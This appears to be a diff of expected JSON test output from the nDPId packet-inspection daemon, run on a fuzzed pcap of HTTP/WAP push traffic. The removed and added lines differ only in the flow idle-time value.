-00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="} -00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"} -01413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854565448,"pkt":"CAAgZV17c1CLk5N8CABFAALsT0tAAIAGSoasFAMFrBQDDQowAFDlXnSkyvaTgVAYIjgpLgAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpI9HN0OiAxNzIuMjAuMy4xMw0KcW9udE1udC1UeXBlOiBhcHBsaWNhdGl\/bi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS6wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElBICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2twZm9ydW0ub3JnL0RURC9wYXBfMS4wLrx0ZMA+CjxwYVM+CiAgPHJlc3VsdC5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1T2gtaWQ9IjFoOTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5ldCIgc2VuZGVyLWFkZHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFpZT0id2dwNCIgcmVjZWl2dmQtdGltcT0iNjAwMi0wOS0xMlQxODowMDowOVoiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTg6MDA6MTJaIiBtZXNzYWdlLXN0YXRlPSJkZWyDdmVyZWQiIGNvZGU9IjEwMDBYPgogICAgPGFkZHJlc3MgYWRkcu5zcy12YWx1ZUIiV0FQUFVTSD0rNDkxNzI2MTAxMDA0L1RZUEU9UExNTkAxNzIuMjAuMy41Ij48L2FkZHJlc3M+CiAgICA8cXVhbGl0eS1vZi1zZXJ2aWNlIGRlbGl2ZXJ5LW1ldGhvZD0idW5jb25maXJtZWR0IG5ldHdvcms9IkdTTSI+PC9xa2FsaXR5LW9mLXNlcnZpY2U+CiAgPC9yZXN1bHRub3RpZmljYXRpb24tbWVzc2FnZT4KPC9wYXA+"} -00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854565449,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565447,"flow_last_seen":1031854565447,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854565447,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":118,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":1,"flow_last_seen":1031854565447,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1031854565447,"pkt":"AFCLk5N8CAAgsl17CABFAAAsxNxAAEQGF7WsFAMNrBQDBQBQCjDK9pOA5V50pGASgyzztQAAAgQFtA=="} +00473{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":119,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":2,"flow_last_seen":1031854565448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1031854565448,"pkt":"CAAgsl17AFCLk5N8CABFAAAoTktAAIAGTkqsFAMFrBQDDQowAFDlXnSkyvaTgVAQIgtsZgAAAgQFtCiq"} +01413{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_packet_id":3,"flow_last_seen":1031854565448,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":762,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":762,"pkt_l4_len":728,"thread_ts_msec":1031854565448,"pkt":"CAAgZV17c1CLk5N8CABFAALsT0tAAIAGSoasFAMFrBQDDQowAFDlXnSkyvaTgVAYIjgpLgAAUE9TVCAvc2VydmxldHMvbW1zIEhUVFAvMS4xDQpI9HN0OiAxNzIuMjAuMy4xMw0KcW9udE1udC1UeXBlOiBhcHBsaWNhdGl\/bi94bWwNCkNvbnRlbnQtTGVuZ3RoOiA2MDYNCg0KPD94bWwgdmVyc2lvbj0iMS6wIj8+CjwhRE9DVFlQRSBwYXAgUFVCTElBICItLy9XQVBGT1JVTS8vRFREIFBBUCAxLjAvL0VOIgogICAgICAgICAgImh0dHA6Ly93d3cud2twZm9ydW0ub3JnL0RURC9wYXBfMS4wLrx0ZMA+CjxwYVM+CiAgPHJlc3VsdC5vdGlmaWNhdGlvbi1tZXNzYWdlIHB1T2gtaWQ9IjFoOTMwMV8xMDMxODU0NTYyNDgyXzEwMzhAZ2VjZHMyLm1vYmlsaXR5bGFiLm5ldCIgc2VuZGVyLWFkZHJlc3M9Imh0dHA6Ly9sbWNtb2xmLndhcG1hdGljLmRlIiBzZW5kZXItbmFpZT0id2dwNCIgcmVjZWl2dmQtdGltcT0iNjAwMi0wOS0xMlQxODowMDowOVoiIGV2ZW50LXRpbWU9IjIwMDItMDktMTJUMTg6MDA6MTJaIiBtZXNzYWdlLXN0YXRlPSJkZWyDdmVyZWQiIGNvZGU9IjEwMDBYPgogICAgPGFkZHJlc3MgYWRkcu5zcy12YWx1ZUIiV0FQUFVTSD0rNDkxNzI2MTAxMDA0L1RZUEU9UExNTkAxNzIuMjAuMy41Ij48L2FkZHJlc3M+CiAgICA8cXVhbGl0eS1vZi1zZXJ2aWNlIGRlbGl2ZXJ5LW1ldGhvZD0idW5jb25maXJtZWR0IG5ldHdvcms9IkdTTSI+PC9xa2FsaXR5LW9mLXNlcnZpY2U+CiAgPC9yZXN1bHRub3RpZmljYXRpb24tbWVzc2FnZT4KPC9wYXA+"} +00658{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":120,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":36,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1031854565447,"flow_last_seen":1031854565448,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":708,"flow_tot_l4_payload_len":708,"flow_avg_l4_payload_len":236,"midstream":0,"thread_ts_msec":1031854565448,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565449,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854565449,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.148.5","src_port":80,"dst_port":2608,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":121,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":37,"flow_packet_id":1,"flow_last_seen":1031854565449,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1031854565449,"pkt":"AFCLk5MlcwAgsl17CABFAAAoxN1AAEAGF7isFAMNrBSUBQBQCjDK9viB5V53aFEQgywIrgAA"} 00561{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854565547,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3} 01119{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":122,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_packet_id":1,"flow_last_seen":1031854565547,"flow_idle_time":600000,"pkt_oversize":false,"pkt_caplen":541,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":541,"pkt_l4_len":507,"thread_ts_msec":1031854565547,"pkt":"AFCLk5N8CAAgsl17CABFAAIPxN5AACVzANCsFAMNrBQDBQBQCjDK9pOB5V53aFAYgywfUQAASFRUUC8xLjEgMjAwIE9LDQpTZXJ2ZXI6IFJlc2luLzIuMC4xDQpDb250ZW50LVR5cGU6IGFwcGxpY2F0aW9uL3htbA0KQ29udGVudC1MZW5ndGg6IDM1OA0KRGF0ZTogVGh1LCAxMiBTZXAgMjA0MiAxODoxNjowNTBHTVQNCg0KPD94bWwgdmVyc2lvbj0iMS4wIj8+DQo8IURPQ1RZUEUgcGFwIFBVQkxJQyAiLS8vV0FQRk9SVU0vL0RUlCBQQVAgMS4wLy9FTiIgImh0dHA6Ly93d3cud2FwZm9ydW0ub3JnL0RURC9wYXBfMS4wLmR0ZCI+DQo8cGFwPg0KPFplc3VsdG5vdBBmaWNhdGlvbi1yZXNwb25zZSBwdXNoLWlkPSIxODkPMDFfMTAzMTg1NDU2MjQ4Ml8xMDM4QGdlY2RzMi5tb2JpbGl0eWxhYi5uZXQiIGNvZGU9IjEwMDAiIGRlc2M9Ik9LIj4NCjxhZGRyZXNzIGFkZKqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqg=="} 00217{"error_event_id":9,"error_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","l4_data_len":20,"global_ts_msec":1031854568982} 00356{"packet_event_id":1,"packet_event_name":"packet","packet_id":130,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":54,"pkt_l4_len":0,"thread_ts_msec":1031854568982,"pkt":"AFCLk5N8CAAgsl17CABFAAAoxOJAl0AGF7OsFAMNrBQDBQBQCi7Kxgh65UF0ElARgyyXWQAA"} -00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7440000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} -00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00665{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00591{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854489007,"flow_last_seen":1031854489007,"flow_idle_time":7560000,"flow_min_l4_payload_len":89,"flow_max_l4_payload_len":89,"flow_tot_l4_payload_len":89,"flow_avg_l4_payload_len":89,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.1","dst_ip":"172.20.3.13","src_port":80,"dst_port":53132,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":13,"flow_first_seen":1031854489004,"flow_last_seen":1031854494143,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":840,"flow_tot_l4_payload_len":1156,"flow_avg_l4_payload_len":88,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53132,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":35,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562690,"flow_last_seen":1031854562690,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.67.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00593{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":33,"flow_state":"info","flow_packets_processed":12,"flow_first_seen":1031854562488,"flow_last_seen":1031854567701,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":427,"flow_tot_l4_payload_len":973,"flow_avg_l4_payload_len":81,"midstream":1,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53136,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00663{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00589{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":32,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.5","dst_ip":"172.20.35.13","src_port":80,"dst_port":53136,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00662{"flow_event_id":5,"flow_event_name":"guessed","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"1":"Match by port"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {}} +00588{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":31,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854562488,"flow_last_seen":1031854562488,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","src_port":53193,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00577{"flow_event_id":8,"flow_event_name":"not-detected","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"ndpi": {"proto":"Unknown","breed":"Unrated"}} 00562{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":131,"source":"fuzz-2006-09-29-28586.pcap","alias":"nDPId-test","flow_id":38,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1031854565547,"flow_last_seen":1031854565547,"flow_idle_time":600000,"flow_min_l4_payload_len":507,"flow_max_l4_payload_len":507,"flow_tot_l4_payload_len":507,"flow_avg_l4_payload_len":507,"midstream":0,"thread_ts_msec":1031854568982,"l3_proto":"ip4","src_ip":"172.20.3.13","dst_ip":"172.20.3.5","l4_proto":115,"flow_datalink":1,"flow_max_packets":3} 